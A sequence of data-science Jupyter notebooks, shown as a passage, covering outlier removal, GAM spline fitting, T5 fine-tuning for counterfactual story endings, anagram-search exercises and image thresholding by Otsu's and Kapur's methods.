upper_bound = q3 + [IQR * 1.5]
return np.where((x > upper_bound) | (x < lower_bound))
idx_of_outliers(x.values)
###Output
_____no_output_____
###Markdown
Values that fall outside the 5th ~ 95th percentile range can also be treated as outliers.
###Code
print('5th percentile: ', x.quantile(q=0.05))
print('95th percentile: ', x.quantile(q=0.95))
x[(x < x.quantile(q=0.05)) | (x > x.quantile(q=0.95))]
###Output
_____no_output_____
###Markdown
Handling outliers* Remove the outlier values* Transform the values, for example by taking the natural log to reduce their magnitude
###Code
houses = pd.DataFrame()
houses['Price'] = [534433, 392333, 293222, 4322032]
houses['Bedrooms'] = [2, 3.5, 2, 116]
houses['Square_Feets'] = [1500, 2500, 1500, 48000]
houses
###Output
_____no_output_____
###Markdown
The simplest way to handle outliers is to delete them.
###Code
houses.describe()
q1 = houses['Bedrooms'].quantile(0.25)
q3 = houses['Bedrooms'].quantile(0.75)
iqr = q3 - q1
# Apply filter with respect to IQR
filter = (houses['Bedrooms'] >= q1 - 1.5*iqr) & (houses['Bedrooms'] <= q3 + 1.5*iqr)
houses.loc[filter]
###Output
_____no_output_____
###Markdown
Transform the column so that the influence of the outliers is reduced.
###Code
# log transform
houses['Log_Square_Feets'] = [np.log(x) for x in houses['Square_Feets']]
houses
###Output
_____no_output_____ |
content/post/the-guts-of-gams/the-guts-of-gams.ipynb | ###Markdown
This post will explain some of the internals of GAMs: how to estimate the feature functions. First we'll fit some simple splines on some wage data, then we'll fit more complicated splines on some accelerometer data, with a highly non-linear relationship between the input and the output.
###Code
import pandas as pd
import patsy
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.preprocessing import PolynomialFeatures
import statsmodels.api as sm
import statsmodels.formula.api as smf
%matplotlib inline
###Output
/Users/thomas.kealy/anaconda3/lib/python3.6/site-packages/statsmodels/compat/pandas.py:56: FutureWarning: The pandas.core.datetools module is deprecated and will be removed in a future version. Please use the pandas.tseries module instead.
from pandas.core import datetools
###Markdown
GAMs are smooth, semi-parametric models of the form:$$ y = \sum_{i=0}^{n-1} \beta_i f_i\left(x_i\right) $$where \\(y\\) is the dependent variable, \\(x_i\\) are the independent variables, \\(\beta\\) are the model coefficients, and \\(f_i\\) are the feature functions. We build the \\(f_i\\) using a type of function called a spline; splines allow us to automatically model non-linear relationships without having to manually try out many different transformations on each variable. First of all, we'll use `patsy` to construct a few spline bases and fit generalised linear models with `statsmodels`. Then, we'll dive into constructing splines ourselves; following Simon Wood's book we'll use penalised regression splines. Firstly, we'll use `patsy` to create some basic spline models. The data we're using comes from https://vincentarelbundock.github.io/Rdatasets/doc/ISLR/Wage.html. It's plotted below:
###Code
df = pd.read_csv('Wage.csv')
age_grid = np.arange(df.age.min(), df.age.max()).reshape(-1,1)
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
###Output
_____no_output_____
###Markdown
GAMs are essentially linear models, but in a very special (and useful!) basis made of regression splines. We can use the `bs()` function in `patsy` to create such a basis for us:
###Code
transformed_x1 = patsy.dmatrix("bs(df.age, knots=(25,40,60), degree=3, include_intercept=False)", {"df.age": df.age}, return_type='dataframe')
fit1 = sm.GLM(df.wage, transformed_x1).fit()
fit1.params
age_grid = np.arange(df.age.min(), df.age.max()).reshape(-1,1)
pred = fit1.predict(patsy.dmatrix("bs(age_grid, knots=(25,40,60), include_intercept=False)",
{"age_grid": age_grid}, return_type='dataframe'))
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
plt.plot(age_grid, pred, color='b', label='Specifying three knots')
plt.xlim(15,85)
plt.ylim(0,350)
plt.xlabel('age')
plt.ylabel('wage')
###Output
_____no_output_____
###Markdown
Here we have prespecified knots at ages 25, 40, and 60. This produces a spline with six basis functions. A cubic spline with three knots has 7 degrees of freedom: one for the intercept plus six for the basis functions. We could also have specified knot points at uniform quantiles of the data:
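As a quick sanity check on that count (assuming the cells above have been run), we can look at the design matrix patsy built; it should have seven columns, an intercept plus the six spline basis functions.

```python
# Inspect the spline design matrix built above: expecting an Intercept column
# plus six B-spline basis columns for the three-knot cubic spline.
print(transformed_x1.shape)
print(transformed_x1.columns.tolist())
```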
###Code
# Specifying 6 degrees of freedom
transformed_x2 = patsy.dmatrix("bs(df.age, df=6, include_intercept=False)",
{"df.age": df.age}, return_type='dataframe')
fit2 = sm.GLM(df.wage, transformed_x2).fit()
fit2.params
age_grid = np.arange(df.age.min(), df.age.max()).reshape(-1,1)
pred = fit2.predict(patsy.dmatrix("bs(age_grid, df=6, include_intercept=False)",
{"age_grid": age_grid}, return_type='dataframe'))
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
plt.plot(age_grid, pred, color='b', label='Specifying three knots')
plt.xlim(15,85)
plt.ylim(0,350)
plt.xlabel('age')
plt.ylabel('wage')
###Output
_____no_output_____
###Markdown
Finally, we can also fit natural splines with the `cr()` function:
###Code
# Specifying 4 degrees of freedom
transformed_x3 = patsy.dmatrix("cr(df.age, df=4)", {"df.age": df.age}, return_type='dataframe')
fit3 = sm.GLM(df.wage, transformed_x3).fit()
fit3.params
pred = fit3.predict(patsy.dmatrix("cr(age_grid, df=4)", {"age_grid": age_grid}, return_type='dataframe'))
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
plt.plot(age_grid, pred, color='g', label='Natural spline df=4')
plt.legend()
plt.xlim(15,85)
plt.ylim(0,350)
plt.xlabel('age')
plt.ylabel('wage')
###Output
_____no_output_____
###Markdown
Let's see how these fits all stack together:
###Code
# Generate a sequence of age values spanning the range
age_grid = np.arange(df.age.min(), df.age.max()).reshape(-1,1)
# Make some predictions
pred1 = fit1.predict(patsy.dmatrix("bs(age_grid, knots=(25,40,60), include_intercept=False)",
{"age_grid": age_grid}, return_type='dataframe'))
pred2 = fit2.predict(patsy.dmatrix("bs(age_grid, df=6, include_intercept=False)",
{"age_grid": age_grid}, return_type='dataframe'))
pred3 = fit3.predict(patsy.dmatrix("cr(age_grid, df=4)", {"age_grid": age_grid}, return_type='dataframe'))
# Plot the splines and error bands
plt.scatter(df.age, df.wage, facecolor='None', edgecolor='k', alpha=0.1)
plt.plot(age_grid, pred1, color='b', label='Specifying three knots')
plt.plot(age_grid, pred2, color='r', label='Specifying df=6')
plt.plot(age_grid, pred3, color='g', label='Natural spline df=4')
plt.legend()
plt.xlim(15,85)
plt.ylim(0,350)
plt.xlabel('age')
plt.ylabel('wage')
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
import patsy
import scipy as sp
import seaborn as sns
from statsmodels import api as sm
%matplotlib inline
df = pd.read_csv('mcycle.csv')
df = df.drop('Unnamed: 0', axis=1)
fig, ax = plt.subplots(figsize=(8, 6))
blue = sns.color_palette()[0]
ax.scatter(df.times, df.accel, c=blue, alpha=0.5)
ax.set_xlabel('time')
ax.set_ylabel('Acceleration')
###Output
_____no_output_____
###Markdown
As discussed earlier: GAMs are smooth, semi-parametric models of the form:$$ y = \sum_{i=0}^{n-1} \beta_i f_i\left(x_i\right) $$where \\(y\\) is the dependent variable, \\(x_i\\) are the independent variables, \\(\beta\\) are the model coefficients, and \\(f_i\\) are the feature functions. We build the \\(f_i\\) using a type of function called a spline. Since our data is 1D, we can model it as:$$ y = \beta_0 + f\left( x \right) + \varepsilon $$We must also choose a basis for \\( f \\):$$ f \left( x \right) = \beta_1 B_1\left(x\right) + \ldots + \beta_k B_k\left(x\right) $$We define $$ X = \left[1, B_1\left(x\right), \ldots, B_k\left(x\right) \right] $$ so we can write:$$ y = \beta_0 + f\left( x \right) + \varepsilon = X\beta + \varepsilon $$We choose to minimise the sum of squares again, this time with a regularisation term:$$ \frac{1}{2} \lVert y - X\beta \rVert^2 + \lambda \int_0^1 f''\left(x\right)^2 dx $$You can show (you, not me!) that the second term can always be written:$$ \int_0^1 f''\left(x\right)^2 dx = \beta^T S \beta $$where \\( S \\) is a positive (semi-)definite matrix (i.e. all its eigenvalues are positive or 0). Therefore our objective function becomes:$$ \frac{1}{2} \lVert y - X\beta \rVert^2 + \lambda \beta^T S \beta $$ and we can use the techniques we've developed fitting linear models to fit additive models! We'll start by fitting a univariate spline, then maybe something more complicated.
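To see why the `fit` function below can hand this off to ordinary least squares, pick any matrix \\(B\\) with \\(B^T B = S\\) (the code uses the matrix square root of \\(S\\)). Then$$ \lVert y - X\beta \rVert^2 + \lambda \beta^T S \beta = \lVert y - X\beta \rVert^2 + \lVert \sqrt{\lambda} B\beta \rVert^2 $$which is the residual sum of squares of an ordinary regression of the response vector padded with zeros on the design matrix stacked row-wise on top of \\(\sqrt{\lambda} B\\). That is exactly the augmentation `fit` performs below; the factor of \\(\frac{1}{2}\\) only rescales \\(\lambda\\) and doesn't change the minimiser.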
###Code
def R(x, z):
return ((z - 0.5)**2 - 1 / 12) * ((x - 0.5)**2 - 1 / 12) / 4 - ((np.abs(x - z) - 0.5)**4 - 0.5 * (np.abs(x - z) - 0.5)**2 + 7 / 240) / 24
R = np.frompyfunc(R, 2, 1)
def R_(x):
return R.outer(x, knots).astype(np.float64)
q = 20
knots = df.times.quantile(np.linspace(0, 1, q))
y, X = patsy.dmatrices('accel ~ times + R_(times)', data=df)
S = np.zeros((q + 2, q + 2))
S[2:, 2:] = R_(knots)
B = np.zeros_like(S)
B[2:, 2:] = np.real_if_close(sp.linalg.sqrtm(S[2:, 2:]), tol=10**8)
def fit(y, X, B, lambda_=1.0):
# build the augmented matrices
y_ = np.vstack((y, np.zeros((q + 2, 1))))
X_ = np.vstack((X, np.sqrt(lambda_) * B))
return sm.OLS(y_, X_).fit()
min_time = df.times.min()
max_time = df.times.max()
plot_x = np.linspace(min_time, max_time, 100)
plot_X = patsy.dmatrix('times + R_(times)', {'times': plot_x})
results = fit(y, X, B)
fig, ax = plt.subplots(figsize=(8, 6))
blue = sns.color_palette()[0]
ax.scatter(df.times, df.accel, c=blue, alpha=0.5)
ax.plot(plot_x, results.predict(plot_X))
ax.set_xlabel('time')
ax.set_ylabel('accel')
ax.set_title(r'$\lambda = {}$'.format(1.0))
###Output
_____no_output_____ |
huggingface_t5_3_1.ipynb | ###Markdown
Preparation
###Code
from google.colab import drive
drive.mount('/content/drive')
root = 'drive/MyDrive/LM/'
!pip install sentencepiece
!pip install transformers -q
!pip install wandb -q
# Importing stock libraries
import numpy as np
import pandas as pd
import time
from tqdm import tqdm
import os
import regex as re
import torch
from torch import cuda
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader, RandomSampler, SequentialSampler
# Importing the T5 modules from huggingface/transformers
from transformers import T5Tokenizer, T5ForConditionalGeneration
# WandB – Import the wandb library
import wandb
# Checking out the GPU we have access to. This is output is from the google colab version.
!nvidia-smi
# # Setting up the device for GPU usage
device = 'cuda' if cuda.is_available() else 'cpu'
print("Device is: ", device)
# Set random seeds and deterministic pytorch for reproducibility
SEED = 42
torch.manual_seed(SEED) # pytorch random seed
np.random.seed(SEED) # numpy random seed
torch.backends.cudnn.deterministic = True
# Login to wandb to log the model run and all the parameters
# 7229adacb32965027d73056a6927efd0365a00bc
!wandb login
# Global Parameter
model_version = "3.1"
# WandB – Initialize a new run
wandb.init(project="counterfactual"+model_version)
# WandB – Config is a variable that holds and saves hyperparameters and inputs
# Defining some key variables that will be used later on in the training
config = wandb.config # Initialize config
config.TRAIN_BATCH_SIZE = 16 # input batch size for training (default: 64)
config.VALID_BATCH_SIZE = 32 # input batch size for testing (default: 1000)
config.TRAIN_EPOCHS = 51 # number of epochs to train (default: 10)
config.VAL_EPOCHS = 1
config.LEARNING_RATE = 1e-4 # learning rate (default: 0.01)
config.SEED = 42 # random seed (default: 42)
config.SOURCE_LEN = 150
config.TARGET_LEN = 110
config.LOAD_PATH = root+'models/model'+model_version+'.tar'
config.SAVE_PATH = root+'models/model'+model_version+'.tar'
PRETRAINED_MODEL_NAME = "t5-base"
# tokenzier for encoding the text
tokenizer = T5Tokenizer.from_pretrained(PRETRAINED_MODEL_NAME)
# Defining the model. We are using t5-base model and added a Language model layer on top for generation of Summary.
# Further this model is sent to device (GPU/TPU) for using the hardware.
model = T5ForConditionalGeneration.from_pretrained(PRETRAINED_MODEL_NAME)
model = model.to(device)
# Defining the optimizer that will be used to tune the weights of the network in the training session.
optimizer = torch.optim.Adam(params = model.parameters(), lr=config.LEARNING_RATE)
###Output
_____no_output_____
###Markdown
Load dataframe
###Code
#training df
small_path = root + '/TimeTravel/train_supervised_small.json'
small_df = pd.read_json(small_path, lines=True)
small_df.head()
print(small_df.loc[:,"edited_ending"][0])
# text_a: source, text_b: target
text_a, text_b = [], []
for i in range(len(small_df)):
text_a.append("premise: " + small_df.loc[i, 'premise'] + " initial: " + \
small_df.loc[i, 'initial'] + " counterfactual: " + small_df.loc[i, 'counterfactual'] + \
" original_ending: " + small_df.loc[i, 'original_ending'])
#text_a.append(re.sub(re_pat, df.loc[i, 'edit1'], df.loc[i, 'original1']))
text_b.append("edited_ending: " + small_df.loc[i, 'edited_ending'][0] +" "+ small_df.loc[i, 'edited_ending'][1] +" "+ \
small_df.loc[i, 'edited_ending'][2])
train_df = pd.DataFrame({'source_text': text_a, 'target_text': text_b})
train_df.head()
print(train_df.loc[0, "source_text"])
print("-------------")
print(train_df.loc[0, "target_text"])
print(train_df.shape)
#train_df = train_df[0:4000]
source_lens = train_df.source_text.apply(lambda x: len(tokenizer.encode_plus(x, return_tensors='pt').input_ids.squeeze())).to_list()
target_lens = train_df.target_text.apply(lambda x: len(tokenizer.encode_plus(x, return_tensors='pt').input_ids.squeeze())).to_list()
print("Max source length is: ", max(source_lens))
print("Max target length is: ", max(target_lens))
# valid df
large_path = root + '/TimeTravel/train_supervised_large.json'
df_large = pd.read_json(large_path, lines=True)
print(len(df_large))
small_ids = []
for i in range(len(small_df)):
small_ids.append(small_df.loc[i, 'story_id'])
print(len(small_ids))
df_large = df_large[~df_large.story_id.isin(small_ids)]
df_large = df_large.reset_index() # must reset index after delete rows
print(len(df_large))
# select data not in training set
#part_df_large = df_large[0:100]
part_df_large = df_large[0:1000]
part_df_large = part_df_large.reset_index()
print(len(part_df_large))
text, gt = [],[] # gt for ground truth
for i in range(len(part_df_large)):
text.append("premise: " + part_df_large.loc[i, 'premise'] + \
" initial: " + part_df_large.loc[i, 'initial'] + \
" counterfactual: " + part_df_large.loc[i, 'counterfactual'] + \
" original_ending: " + part_df_large.loc[i, 'original_ending'])
gt.append("edited_ending: " + part_df_large.loc[i, 'edited_ending'][0] +" "+ \
part_df_large.loc[i, 'edited_ending'][1] +" "+ part_df_large.loc[i, 'edited_ending'][2])
print(len(text))
valid_df = pd.DataFrame({'source_text': text, 'target_text': gt})
valid_df.head()
###Output
_____no_output_____
###Markdown
Dataset and Dataloader
###Code
# Creating a custom dataset for reading the dataframe and loading it into the dataloader to pass it to the neural network at a later stage for finetuning the model and to prepare it for predictions
class CustomDataset(Dataset):
def __init__(self, dataframe, tokenizer, ori_len, con_len):
self.tokenizer = tokenizer
self.data = dataframe
self.ori_len = ori_len
self.con_len = con_len
self.original = self.data.source_text
self.counterfactual = self.data.target_text
def __len__(self):
return len(self.counterfactual)
def __getitem__(self, index):
original = str(self.original[index])
# original = ' '.join(original.split())
counterfactual = str(self.counterfactual[index])
# counterfactual = ' '.join(counterfactual.split())
source = self.tokenizer.encode_plus(original, max_length= self.ori_len, padding='max_length', return_tensors='pt')
target = self.tokenizer.encode_plus(counterfactual, max_length= self.con_len, padding='max_length', return_tensors='pt')
source_ids = source['input_ids'].squeeze()
source_mask = source['attention_mask'].squeeze()
target_ids = target['input_ids'].squeeze()
target_mask = target['attention_mask'].squeeze()
return {
'source_ids': source_ids.to(dtype=torch.long),
'source_mask': source_mask.to(dtype=torch.long),
'target_ids': target_ids.to(dtype=torch.long),
'target_ids_y': target_ids.to(dtype=torch.long)
}
trainingset = CustomDataset(dataframe=train_df, tokenizer=tokenizer, ori_len=config.SOURCE_LEN , con_len=config.TARGET_LEN )
validset = CustomDataset(dataframe=valid_df, tokenizer=tokenizer, ori_len=config.SOURCE_LEN , con_len=config.TARGET_LEN )
# pick up a data sample
sample_idx = 4
sample = trainingset[sample_idx]
source_ids = sample["source_ids"]
source_mask = sample["source_mask"]
target_ids = sample["target_ids"]
target_ids_y = sample["target_ids_y"]
print(source_ids)
print(train_df.iloc[sample_idx].target_text)
sen = tokenizer.decode(target_ids, skip_special_tokens=False) # skip_special_tokens=True will be completely same.
print(sen)
# DataLoader
train_params = {
'batch_size': config.TRAIN_BATCH_SIZE,
'shuffle': True,
'num_workers': 2
}
val_params = {
'batch_size': config.VALID_BATCH_SIZE,
'shuffle': False,
'num_workers': 2
}
training_loader = DataLoader(trainingset, **train_params)
val_loader = DataLoader(validset, **val_params)
print(len(training_loader))
print(len(val_loader))
###Output
1047
32
###Markdown
Define train() and val()
###Code
def save_model(epoch, model, optimizer, loss, PATH):
torch.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss
}, PATH)
def load_model(PATH):
checkpoint = torch.load(PATH)
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
epoch = checkpoint['epoch']
loss = checkpoint['loss']
return model, optimizer, epoch, loss
# Creating the training function. This will be called in the main function. It is run depending on the epoch value.
# The model is put into train mode, then we enumerate over the training loader and pass the batches to the defined network
def train(epoch, tokenizer, model, device, loader, optimizer):
model.train()
for i,data in enumerate(loader):
#len(loader)=10xx
ids = data['source_ids'].to(device, dtype = torch.long)
mask = data['source_mask'].to(device, dtype = torch.long)
y = data['target_ids'].to(device, dtype = torch.long)
# padded ids (pad=0) are set to -100, which means ignore for loss calculation
y[y[: ,:] == tokenizer.pad_token_id ] = -100
label_ids = y.to(device)
outputs = model(input_ids = ids, attention_mask = mask, labels=label_ids)
loss = outputs[0]
#logit = outputs[1]
if i%50 == 0:
wandb.log({"Training Loss": loss.item()})
if i%600==0:
print(f'Epoch: {epoch}, Loss: {loss.item()}')
optimizer.zero_grad()
loss.backward()
optimizer.step()
# xm.optimizer_step(optimizer)
# xm.mark_step()
if (epoch % 5 == 0):
save_model(epoch, model, optimizer, loss.item(), config.SAVE_PATH)
def validate(tokenizer, model, device, loader):
model.eval()
predictions = []
actuals = []
raws = []
with torch.no_grad():
for i, data in enumerate(loader):
y = data['target_ids'].to(device, dtype = torch.long)
ids = data['source_ids'].to(device, dtype = torch.long)
mask = data['source_mask'].to(device, dtype = torch.long)
generated_ids = model.generate(
input_ids = ids,
attention_mask = mask,
num_beams=2,
max_length=config.TARGET_LEN,
repetition_penalty=2.5,
length_penalty=1.0,
early_stopping=True
)
raw = [tokenizer.decode(i, skip_special_tokens=True, clean_up_tokenization_spaces=True) for i in ids]
preds = [tokenizer.decode(i, skip_special_tokens=True, clean_up_tokenization_spaces=True) for i in generated_ids]
target = [tokenizer.decode(i, skip_special_tokens=True, clean_up_tokenization_spaces=True)for i in y]
if i%3==0:
print(f'valid Completed {(i+1)* config.VALID_BATCH_SIZE}')
raws.extend(raw)
predictions.extend(preds)
actuals.extend(target)
return raws, predictions, actuals
###Output
_____no_output_____
###Markdown
main
###Code
import time
# Helper function to print time between epochs
def epoch_time(start_time, end_time):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
# Log metrics with wandb
#wandb.watch(model, log="all")
# Training loop
print('Initiating Fine-Tuning for the model on counterfactual dataset:')
for epoch in range(config.TRAIN_EPOCHS):
#for epoch in tqdm(range(config.TRAIN_EPOCHS)):
start_time = time.time()
train(epoch, tokenizer, model, device, training_loader, optimizer)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
print(f'Epoch: {epoch:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')
# Mark the run as finished
wandb.finish()
# Load model
# model = T5ForConditionalGeneration.from_pretrained(PRETRAINED_MODEL_NAME)
# model = model.to(device)
# optimizer = torch.optim.Adam(params = model.parameters(), lr=config.LEARNING_RATE)
# model, optimizer, epoch, loss = load_model(config.LOAD_PATH)
# Validation loop and saving the resulting file with predictions and acutals in a dataframe.
# Saving the dataframe as predictions.csv
print('Now inferecing:')
start_time = time.time()
raws, predictions, actuals = validate(tokenizer, model, device, val_loader)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
print(f'Time: {epoch_mins}m {epoch_secs}s')
final_df = pd.DataFrame({'raw_text': raws, 'ground_truth': actuals, 'generated_text': predictions})
#final_df.to_csv(root + 'results/' + 'output' + model_version + '.csv')
final_df.to_excel(root + 'results/' + 'output' + model_version + '.xlsx')
print('Output Files generated for review')
print(len(actuals))
###Output
1000
|
notebooks/algorithms.ipynb | ###Markdown
Algorithms [Click here to run this chapter on Colab](https://colab.research.google.com/github/AllenDowney/DSIRP/blob/main/notebooks/algorithms.ipynb) Searching for anagrams. In this notebook we'll implement algorithms for two tasks:* Testing a pair of words to see if they are anagrams of each other, that is, if you can rearrange the letters in one word to spell the other.* Searching a list of words for all pairs that are anagrams of each other. There is a point to these examples, which I will explain at the end. **Exercise 1:** Write a function that takes two words and returns `True` if they are anagrams. Test your function with the examples below.
###Code
def is_anagram(word1, word2):
return False
is_anagram('tachymetric', 'mccarthyite') # True
is_anagram('post', 'top') # False, letter not present
is_anagram('pott', 'top') # False, letter present but not enough copies
is_anagram('top', 'post') # False, letters left over at the end
is_anagram('topss', 'postt') # False
###Output
_____no_output_____
###Markdown
**Exercise 2:** Use `timeit` to see how fast your function is for these examples:
###Code
%timeit is_anagram('tops', 'spot')
%timeit is_anagram('tachymetric', 'mccarthyite')
###Output
_____no_output_____
###Markdown
NOTE: How can we compare algorithms running on different computers? Searching for anagram pairs **Exercise 3:** Write a function that takes a word list and returns a list of all anagram pairs.
###Code
short_word_list = ['proudest', 'stop', 'pots', 'tops', 'sprouted']
def all_anagram_pairs(word_list):
return []
all_anagram_pairs(short_word_list)
###Output
_____no_output_____
###Markdown
The following cell downloads a file containing a list of English words.
###Code
from os.path import basename, exists
def download(url):
filename = basename(url)
if not exists(filename):
from urllib.request import urlretrieve
local, _ = urlretrieve(url, filename)
print('Downloaded ' + local)
download('https://github.com/AllenDowney/DSIRP/raw/main/american-english')
###Output
_____no_output_____
###Markdown
The following function reads a file and returns a set of words (I used a set because after we convert words to lower case, there are some repeats.)
###Code
def read_words(filename):
"""Read lines from a file and split them into words."""
res = set()
for line in open(filename):
for word in line.split():
res.add(word.strip().lower())
return res
word_list = read_words('american-english')
len(word_list)
###Output
_____no_output_____
###Markdown
**Exercise 4:** Loop through the word list and print all words that are anagrams of `stop`. Now run `all_anagram_pairs` with the full `word_list`:
###Code
# pairs = all_anagram_pairs(word_list)
###Output
_____no_output_____
###Markdown
**Exercise 5:** While that's running, let's estimate how long it's going to take. A better algorithm**Exercise 6:** Write a better algorithm! Hint: make a dictionary. How much faster is your algorithm?
###Code
def all_anagram_lists(word_list):
"""Finds all anagrams in a list of words.
word_list: sequence of strings
"""
return {}
%time anagram_map = all_anagram_lists(word_list)
len(anagram_map)
###Output
_____no_output_____
###Markdown
Computer Vision 💻 🤓This notebook contains some implementations of Computer Vision/Image processing algorithms. Grayscale resolution
###Code
import sys
import math
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from __future__ import print_function
from ipywidgets import interact
import ipywidgets as widgets
def threshold(res):
img = np.asarray(Image.open('images/lena.png').convert('L')).copy()
step = math.ceil(255/res)
regions = [(x, x+step, x+step-1) for x in range(0,255,step)]
for (lo, hi, color) in regions:
img[np.logical_and(img>=lo, img<hi)] = color
plt.imshow(img, cmap='gray')
plt.show()
_ = interact(threshold, res=widgets.IntSlider(min=2,max=16,step=1,value=4))
###Output
_____no_output_____
###Markdown
Variance based thresholding (Otsu, 1979) Assume image has a grayscale resolution of $L$ gray levels.The number of pixels with gray level $i$ is written as $n_{i}$, so the total number of pixels in the image is $N = n_{1} + n_{2} + \ldots + n_{L}$. Thus, the probability of a pixel having gray level $i$ is:\begin{equation} p_{i}=\frac{n_{i}}{N}\end{equation}where\begin{equation} p_{i}>=0 \qquad \sum_{i=1}^{L} p_{i}=1\end{equation}Compute between-class variance $\sigma_{B}^2$ and total variance $\sigma_{T}^2$ using $k$:\begin{equation} \sigma_{B}^2=\pi_{0}(\mu_{0} - \mu_{T})^2 + \pi_{1}(\mu_{1} - \mu_{T})^2\end{equation}\begin{equation} \sigma_{T}^2=\sum_{i=1}^{L}(i - \mu_{T})^2p_{i}\end{equation}where\begin{equation} \pi_{0}=\sum_{i=1}^{k}p_{i} \qquad \pi_{1}=\sum_{i=k+1}^{L}p_{i}=1-{\pi_{0}}\end{equation}\begin{equation} \mu_{0}=\sum_{i=1}^{k}ip_{i}/\pi_{0} \quad \mu_{1}=\sum_{i=k+1}^{L}ip_{i}/\pi_{1} \quad \mu_{T}=\sum_{i=1}^{L}ip_{i}\end{equation}The formula for the between-class variance can be simplified to:\begin{equation} \sigma_{B}^2=\pi_{0}\pi_{1}(\mu_{1} - \mu_{0})^2\end{equation}For a single threshold, the criterion to be maximized is the ratio of the between-class variance to the total variance:\begin{equation} \eta=\frac{\sigma_{B}^2}{\sigma_{T}^2}\end{equation}Taken from Computer and Machine Vision (Fourth Edition): Theory, Algorithms, Practicalities. E.R. Davies.
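A side note: $\sigma_{T}^2$ does not depend on $k$, so maximising $\eta$ is equivalent to maximising $\sigma_{B}^2$ alone. The sketch below is a vectorised alternative formulation of that criterion using cumulative sums, not the implementation used in this notebook; it indexes gray levels from 0 (a constant shift that does not move the argmax), and its inclusive/exclusive split convention may make the returned index differ by one from the loop version that follows.

```python
# Vectorized sketch of Otsu's criterion (not the notebook's implementation):
# sigma_T^2 is constant in k, so we only need to maximize sigma_B^2.
import numpy as np

def otsu_threshold(hist):
    p = hist / hist.sum()
    i = np.arange(p.size)
    pi0 = np.cumsum(p)           # class-0 probability for each candidate threshold
    pi1 = 1.0 - pi0              # class-1 probability
    m = np.cumsum(i * p)         # running first moment
    mT = m[-1]                   # total mean
    with np.errstate(divide='ignore', invalid='ignore'):
        sigma_b = (mT * pi0 - m) ** 2 / (pi0 * pi1)   # equals pi0*pi1*(mu1 - mu0)^2
    return int(np.nanargmax(sigma_b))
```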
###Code
import sys
import numpy as np
from PIL import Image
image = np.asarray(Image.open('images/lena.png').convert('L'))
img = image.copy()
hist, _ = np.histogram(img, bins=256)
def histogram_variance(hist, k):
probs = hist / hist.sum()
pi_zero = np.sum(probs[:k])
pi_one = 1 - pi_zero
def compute_mi_zero():
factors = np.array(range(0,k)) / pi_zero
return np.dot(probs[:k], factors)
def compute_mi_one():
factors = np.array(range(k+1, probs.size+1)) / pi_one
return np.dot(probs[k:], factors)
def compute_mi_t():
factors = np.array(range(0, probs.size))
return np.dot(probs, factors)
mi_zero = compute_mi_zero()
mi_one = compute_mi_one()
mi_t = compute_mi_t()
variance_b = pi_zero * pi_one * (mi_one - mi_zero) ** 2
def compute_variance_t():
factors = (np.array(range(0, probs.size)) - mi_t) ** 2
return np.dot(probs, factors)
variance_t = compute_variance_t()
variances_ratio = variance_b / variance_t
return variances_ratio
def variance_based_thresholding(hist):
ratios = np.array([histogram_variance(hist, x) for x in range(0,256)])
return np.argmax(ratios), ratios
k, ratios = variance_based_thresholding(hist)
black_region = np.where(img >= k)
white_region = np.where(img < k)
img[black_region] = 0
img[white_region] = 255
fig, (ax1, ax2) = plt.subplots(1, 2)
fig.set_figwidth(10)
ax1.set_title(f'When k={k}')
ax1.imshow(img, cmap='gray')
plt.plot(k, ratios[k], 'go')
ax2.plot(ratios)
ax2.set_title('Variances ratios')
ax2.set_xlabel(f'k')
_ = ax2.set_ylabel('in_between_variance/total_variance')
###Output
_____no_output_____
###Markdown
Entropy based thresholding (Kapur et al., 1985)Divide intensity probability distribution in two classes: those with gray levels up to the threshold value $k$ and those with gray levels above $k$. This leads to two probability distributions A and B:\begin{equation} A: \frac{p_{1}}{P_{k}}, \frac{p_{2}}{P_{k}}, \ldots, \frac{p_{k}}{P_{k}}\end{equation}\begin{equation} B: \frac{p_{k+1}}{1-p_{k}}, \frac{p_{k+2}}{1-p_{k}}, \ldots, \frac{p_{L}}{1-p_{k}}\end{equation}where:\begin{equation} P_{k}=\sum_{i=1}^{k}p_{i} \qquad 1-p_{k}=\sum_{i=k+1}^{L}p_{i}\end{equation}\begin{equation} H(A)=-\sum_{i=1}^{k}\frac{p_{i}}{P_{k}}\ln{\frac{p_{i}}{P_{k}}}\end{equation}\begin{equation} H(B)=-\sum_{i=k+1}^{L}\frac{p_{i}}{1-P_{k}}\ln{\frac{p_{i}}{1-P_{k}}}\end{equation}and the total entropy is:\begin{equation} H(k) = H(A) + H(B)\end{equation}Taken from Computer and Machine Vision (Fourth Edition): Theory, Algorithms, Practicalities. E.R. Davies.
###Code
import sys
import math
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
image = np.asarray(Image.open('images/lena.png').convert('L'))
img = image.copy()
hist, _ = np.histogram(img, bins=256)
def histogram_entropy(hist, k):
probs = hist / hist.sum()
pk = np.sum(probs[:k])
pk_complement = 1 - pk
a_dist = probs[:k] / pk
b_dist = probs[k:] / pk_complement
def dist_entropy(dist):
def entropy(x):
if x > 0:
return -x * math.log(x)
else:
return 0
entropy_v = np.vectorize(entropy, otypes=[np.dtype('f8')])
return np.sum(entropy_v(dist))
entropy_a = dist_entropy(a_dist)
entropy_b = dist_entropy(b_dist)
total_entropy = entropy_a + entropy_b
return total_entropy
def maximum_entropy_thresholding(hist):
entropies = np.array([histogram_entropy(hist, x) for x in range(0,256)])
return np.argmax(entropies), entropies
k, entropies = maximum_entropy_thresholding(hist)
black_region = np.where(img >= k)
